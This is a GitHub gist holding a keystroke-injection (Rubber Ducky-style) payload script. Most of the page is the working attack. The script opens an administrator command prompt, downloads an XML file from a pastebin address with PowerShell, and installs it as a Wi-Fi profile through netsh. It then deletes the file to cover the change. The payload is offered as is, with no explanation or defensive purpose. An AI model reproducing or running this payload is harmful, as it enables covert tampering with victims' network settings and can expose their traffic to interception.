Created
April 18, 2018 02:40
-
-
Save JonnyBanana/cf32d3262053f04cb4d939d6b92d42e2 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DEFAULT_DELAY 200 | |
DELAY 3000 | |
GUI r | |
STRING cmd | |
MENU | |
STRING a | |
ENTER | |
LEFT | |
ENTER | |
STRING cd %TEMP% | |
ENTER | |
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=8WsHSWdZ','%TEMP%\a.xml') | |
ENTER | |
DELAY 1000 | |
ENTER | |
STRING netsh wlan add profile filename="a.xml" interface="Wireless Network Connection" | |
ENTER | |
STRING del a.xml | |
ENTER | |
STRING exit | |
ENTER |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment